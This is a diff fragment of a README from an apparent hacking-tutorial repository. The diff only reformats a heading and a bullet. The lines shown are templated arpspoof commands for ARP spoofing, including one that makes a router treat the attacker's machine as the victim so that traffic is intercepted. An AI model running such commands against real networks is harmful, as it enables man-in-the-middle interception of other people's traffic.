Maulem/Hacking-Library/README.md

  sudo arpspoof -i {NETWORK_INTERFACE} -t {TARGET_IP} {IP_YOU_WILL_BE_PRETENDING_TO_BE}
 ```

+#### First terminal:

-- First to make the router think that our machine is the victim:
+First to make the router think that our machine is the victim:

 ```console
  sudo arpspoof -i {NETWORK_INTERFACE} -t {ROUTER_IP} {VICTIM_IP}